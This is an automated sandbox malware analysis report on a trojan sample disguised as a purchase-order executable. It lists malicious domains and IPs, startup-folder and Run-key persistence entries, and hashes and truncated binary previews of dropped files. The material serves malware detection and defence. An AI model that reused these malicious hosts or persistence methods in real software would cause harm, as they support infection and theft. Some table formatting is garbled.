http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://www.slwmarketing.online/Exchange.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6%2FRantCn63Wcie | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/29590/bg1.png) | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.html | sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a8.html | sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://go.microsoft.c | sages.exe, 00000016.00000002.5956179976.00000000008FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://i2.cdn-image.com/__media__/js/min.js?v2.3 | sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.html | clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | false
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://gemini.google.com/app?q=clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.slwmarketing.online/__media__/js/trademark.php?d=slwmarketing.online&type=nssage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
Map legend:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | false
23.225.34.75 | www.bashei.top | United States | 40065 | CNSERVERSUS | true
43.153.84.190 | www.hubeisuizhou.net | Japan | 4249 | LILLY-ASUS | true
172.67.149.53 | www.1win-moldovia.fun | United States | 13335 | CLOUDFLARENETUS | true

Private IPs:
IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1564715
Start date and time: 2024-11-28 18:47:32 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 22m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: PO# 81136575.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@31/9@24/5
EGA Information:
• Successful, ratio: 62.5%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 182
• Number of non-executed functions: 4
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
• Execution Graph export aborted for target sages.exe, PID 7024 because it is empty
• Execution Graph export aborted for target sages.exe, PID 8000 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: PO# 81136575.exe
Time | Type | Description
12:54:39 | API Interceptor | 32x Sleep call for process: PING.EXE modified
12:56:14 | API Interceptor | 16610235x Sleep call for process: sage.exe modified
12:57:11 | API Interceptor | 1532565x Sleep call for process: clip.exe modified
18:53:38 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.lnk
18:54:57 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
18:59:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sage C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
18:59:34 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sage C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
217.70.184.50 | Order No 24.exe | Get hash | malicious | FormBook | Browse | www.4nk.education/gnvu/
217.70.184.50 | RFQ.exe | Get hash | malicious | FormBook | Browse | www.4nk.education/gnvu/
217.70.184.50 | statement of accounts.exe | Get hash | malicious | FormBook | Browse | www.4nk.education/gnvu/
217.70.184.50 | RFQ.exe | Get hash | malicious | FormBook | Browse | www.astorg-group.info/vdvc/
217.70.184.50 | RFQ.exe | Get hash | malicious | FormBook | Browse | www.astorg-group.info/vdvc/
217.70.184.50 | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | www.astorg-group.info/vdvc/
217.70.184.50 | SWIFT.exe | Get hash | malicious | FormBook | Browse | www.4nk.education/gnvu/?1Do0qp=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FqHTgxtylpm53oBVxwqxSYDOalMgOBA==&yNNX=snRp
217.70.184.50 | #10302024.exe | Get hash | malicious | FormBook | Browse | www.4nk.education/gnvu/
217.70.184.50 | rPO-000172483.exe | Get hash | malicious | FormBook | Browse | www.redlakedispensery.net/6u21/
217.70.184.50 | PO-000041522.exe | Get hash | malicious | FormBook | Browse | www.redlakedispensery.net/6u21/
23.225.34.75 | r9856_7.exe | Get hash | malicious | FormBook | Browse | www.bashei.top/u0n6/
172.67.149.53 | 3Fip115gvy.exe | Get hash | malicious | FormBook | Browse | www.hntv6201.top/4hc5/?1bYL=9VSL3IhCofYw6rlHf1Um7LUlHHZtnqfjmkJX8dllfElXXiDGiageZb50zwldI995GQlRD7XZXw==&5j=tFNxItah5B1Ppp8
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
webredir.vip.gandi.net | Order No 24.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | statement of accounts.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | SWIFT.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | #10302024.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | rPO-000172483.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | PO-000041522.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
www.bashei.top | r9856_7.exe | Get hash | malicious | FormBook | Browse | 23.225.34.75
www.1win-moldovia.fun | ADNOC requesting RFQ.exe | Get hash | malicious | FormBook | Browse | 188.114.97.3
www.1win-moldovia.fun | RFQ urrgently.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
www.1win-moldovia.fun | Quotes updates request.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
www.1win-moldovia.fun | PO-001.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
www.1win-moldovia.fun | LOL and profile.exe | Get hash | malicious | FormBook | Browse | 188.114.97.3
www.1win-moldovia.fun | Petronas request for-quotation.exe | Get hash | malicious | FormBook | Browse | 188.114.97.3
www.1win-moldovia.fun | Purchase order.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
www.1win-moldovia.fun | Remittance advice.exe | Get hash | malicious | FormBook | Browse | 188.114.97.3
www.1win-moldovia.fun | DHL airwaybill # 6913321715 & BL Draft copy.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
LILLY-ASUS | sora.ppc.elf | Get hash | malicious | Mirai | Browse | 43.100.95.196
LILLY-ASUS | loligang.mips-20241128-1536.elf | Get hash | malicious | Mirai | Browse | 40.237.228.142
LILLY-ASUS | loligang.mpsl-20241128-1536.elf | Get hash | malicious | Mirai | Browse | 43.203.62.128
LILLY-ASUS | spc.elf | Get hash | malicious | Mirai, Moobot | Browse | 43.160.133.103
LILLY-ASUS | x86_64.elf | Get hash | malicious | Mirai, Moobot | Browse | 43.29.77.182
LILLY-ASUS | arm7.elf | Get hash | malicious | Mirai, Moobot | Browse | 42.136.202.48
LILLY-ASUS | mpsl.elf | Get hash | malicious | Mirai, Moobot | Browse | 43.61.160.83
LILLY-ASUS | botx.mips.elf | Get hash | malicious | Mirai | Browse | 43.196.161.67
LILLY-ASUS | botx.spc.elf | Get hash | malicious | Mirai | Browse | 43.177.127.170
LILLY-ASUS | botx.mpsl.elf | Get hash | malicious | Mirai | Browse | 40.35.184.114
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | Order No 24.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | RFQ.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | statement of accounts.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | RFQ.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | RFQ.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | SWIFT.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | #10302024.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | rPO-000172483.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
GANDI-ASDomainnameregistrar-httpwwwgandinetFR | PO-000041522.exe | Get hash | malicious | FormBook | Browse |
                                                                                                                            • 217.70.184.50
                                                                                                                            CNSERVERSUSSalmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 154.88.22.104
                                                                                                                            nabm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.209.130.216
                                                                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 154.88.22.101
                                                                                                                            pjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 45.43.9.206
                                                                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 154.88.22.101
                                                                                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 172.247.21.10
                                                                                                                            piR516SetM.ps1Get hashmaliciousUnknownBrowse
                                                                                                                            • 154.90.62.248
                                                                                                                            XwUh11g4l4.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 154.90.62.248
                                                                                                                            REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 23.225.160.132
                                                                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 154.88.22.105
                                                                                                                            No context
Match: C:\Users\user\AppData\Local\Temp\sages.exe
• Associated Sample Name / URL: SecuriteInfo.com.Win64.SpywareX-gen.19438.2696.exe, Detection: malicious, Threat Name: DarkTortilla
• Associated Sample Name / URL: SecuriteInfo.com.Win64.SpywareX-gen.19438.2696.exe, Detection: malicious, Threat Name: DarkTortilla
• Associated Sample Name / URL: file.exe, Detection: malicious, Threat Name: DarkTortilla, PureLog Stealer, zgRAT
• Associated Sample Name / URL: file.exe, Detection: malicious, Threat Name: PureCrypter, DarkTortilla, PureLog Stealer, zgRAT
• Associated Sample Name / URL: file.exe, Detection: malicious, Threat Name: Amadey, DarkTortilla
• Associated Sample Name / URL: image.exe, Detection: malicious, Threat Name: AgentTesla, DarkTortilla
• Associated Sample Name / URL: file.exe, Detection: malicious, Threat Name: DarkTortilla, FormBook
• Associated Sample Name / URL: Approved_Invoice_0000384834.exe, Detection: malicious, Threat Name: DarkTortilla, RedLine, XWorm, zgRAT
• Associated Sample Name / URL: po-544-8370.exe, Detection: malicious, Threat Name: DarkTortilla, RedLine, XWorm, zgRAT
                                                                                                                                              Process:C:\Users\user\Desktop\PO# 81136575.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1378
                                                                                                                                              Entropy (8bit):5.375486659408667
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:MLU84qpE4K1BIKDE4KhKMaKha1qE4DL0E4KOKIE4oKnKoZAE4KzDq:Mgv2HK1BIYHKh6oa1qHDL0HKOtHoAhAL
                                                                                                                                              MD5:8937BBC55E228D182C2BF23EE8288C71
                                                                                                                                              SHA1:68E25407281760451ECED2F5BABD1E1D7128B48A
                                                                                                                                              SHA-256:2FDD2A49B18D4FCAEC52474B1452065F07A75A8ADA2D077F2A2A3911184DAC61
                                                                                                                                              SHA-512:BDB05C973807015F68F603A398C506D582A7438BC62EB082C86E6370A66D0C652F1DF82E598BCA65D0764B0C59CFDA34DCD0C81E863F45CE95DD9BE1A8F43926
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\9071a2976b2ef0ee49d0396431277b05\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\ca77152be4cd7af9700becb268864b42\System.Windows.Forms.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Cu
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\sages.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1362
                                                                                                                                              Entropy (8bit):5.351667243172687
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ML9E4K1BIKDE4KhKMaKhuE4FJE4GulEE46t6AE4KIHcJ684j:MxHK1BIYHKh6ouHFJHTlEH63HKXAvj
                                                                                                                                              MD5:022535AB418BBE35D220F64C7E284C06
                                                                                                                                              SHA1:60466A399C6FDF4DCE024CF8F5E627D632DF5F7E
                                                                                                                                              SHA-256:EBDC941E0F3D86372ED1C23F49AA88E30244B1C54291688B4DB90C3EBB35890E
                                                                                                                                              SHA-512:DFD1857E3F1BAF23309B9262B268585893F7CD316C4197A5A090B89C7E75F8DC439879BC54C562AC6F8CCDDEC6839C40E16D1DF8125CC3178267089B1951C4D1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\52ec98467da21601034ee080a6de3215\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\4e8cc6067585c3a3a918b22c7f6271ba\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):78336
                                                                                                                                              Entropy (8bit):4.369296705546591
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:jlU4+MS3Fu0thSOV4GM0SuHk9Oh/1TRIWUk7NlfaNV9KQLxXXSv:l6o03IGMLuHk+Ck5lfaNP7xSv
                                                                                                                                              MD5:0E362E7005823D0BEC3719B902ED6D62
                                                                                                                                              SHA1:590D860B909804349E0CDC2F1662B37BD62F7463
                                                                                                                                              SHA-256:2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
                                                                                                                                              SHA-512:518991B68496B3F8545E418CF9B345E0791E09CC20D177B8AA47E0ABA447AA55383C64F5BDACA39F2B061A5D08C16F2AD484AF8A9F238CA23AB081618FBA3AD3
                                                                                                                                              Malicious:true
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Win64.SpywareX-gen.19438.2696.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win64.SpywareX-gen.19438.2696.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: image.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: Approved_Invoice_0000384834.exe, Detection: malicious
• Filename: po-544-8370.exe, Detection: malicious
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y ................P..&...........D... ........@.. ....................................`..................................D..W....`..............................hD............................................... ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B.................D......H.......l....%......)....................................................0..6.......(8...t....&.(8...t....&......(8...t...................8;....8%.....(8...t....&.(8...t............:.....(8...t....:.....(8...t....:....(8...t....................................\:@....(8...t....&.)...&8.....(8...t....&(8...t....&.....:.......8x........:L...88....(8...t....&(8...t....&(8...t....&(8...t.....................:....8!.....(8...t....&......(8...t....&.....(8...t....:8.....(8...t....&.
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):99
                                                                                                                                              Entropy (8bit):4.825967546079359
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:kOvmWOONtkEaKC5SufyM1K/RFofD6tRQrLAdIqv:kA5OCNaZ5SuH1MUmt2r0dd
                                                                                                                                              MD5:DD5094E8230DD6AA2828282D62193DF6
                                                                                                                                              SHA1:953EC49D86713DB8BE5BE6572FCE5A8E20E73F5A
                                                                                                                                              SHA-256:CC16E3F4EA7F26D2A97CBDA311430F7BBD2672075BD633A2E595E0359AF896D3
                                                                                                                                              SHA-512:E6DEC7701FF10BE9C8C31FACA6507100BD5EA1D133656C9ABD9C748B70710AB241319DD344CB3283689F0C2CFFDDA2AC294FBD4E9A7B846849F351EDFF5374D7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:904..C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe..2128..
                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1565184
                                                                                                                                              Entropy (8bit):6.919411070401315
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:Mkc92psKAq6ITV5vGbao8LSEI28qSN961kqiwu4H4444C:MkcYaKd6EGbrs4qSOGN4H4444C
                                                                                                                                              MD5:B353674E16431A7424571790D4D58F71
                                                                                                                                              SHA1:EB356AC3D93BC0A61BD38929C3BDB46BBF6C1315
                                                                                                                                              SHA-256:1E474CDEEB0981210D4A74FD907BF35076BD839CDAED665BFCD6360557797895
                                                                                                                                              SHA-512:73FEDC917A39E32503E7DC559B16F583AF1C77E77E63321DA432C0210BAEE211ABE0AB24A2341B5B42AC9EA3CE49BC4A0D2610ECFA8482775564554763857E3F
                                                                                                                                              Malicious:true
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G............."...P.................. ........@.. .......................@............`.................................d...W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......\.......................................................................m..;..Fni...0K`..( ...*&..(!....*.s"........s#........s$........s%........s&........*Z........o9...........*&..(:....*j..{....(...+}.....{....+.*...{......,.+.....,.rq..ps?...z..|....(...+*&........*".......*Vs#...(D...t.........*..(E...*..(:...*..sK...z&.{....+.*6..(;...}....*...{.....r[..p..........(H...&.(*....rs..p..........(H...&*...(*....r...p.........(F....r...p......%...^........(I....*..
                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):26
                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                              Process:C:\Users\user\Desktop\PO# 81136575.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1398
                                                                                                                                              Entropy (8bit):2.9927747434080865
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:8YrWLgD4/BOmRC87q8MSvxyjCyjMH6d0+JT:8FgDsvRC87tMS0CyjMHqT
                                                                                                                                              MD5:9A42D7AD03DB81339F3D1270D20243A0
                                                                                                                                              SHA1:4FB135D4AECA5DA07D816EC7D61B39CCBD6D8D33
                                                                                                                                              SHA-256:240E68D079D37089705AEF9435E2BBD1596FA945C2B48AE5FDA4FF7AF27ACFA3
                                                                                                                                              SHA-512:BD1B3E13A7F52C9B7014AD94CF1FE0D841EB5C4954F129D02ED53B05051939C8AAEB44CF15E6FD2FC09457D7394FBFECCCB4D5FA5F53E3A78AECC3F166640D1B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.....Z.1...........Programs..B............................................P.r.o.g.r.a.m.s.....V.1...........Startup.@............................................S.t.a.r.t.u.p.....Z.2...........sage.exe..B............................................s.a.g.e...e.x.e......
                                                                                                                                              Process:C:\Windows\SysWOW64\PING.EXE
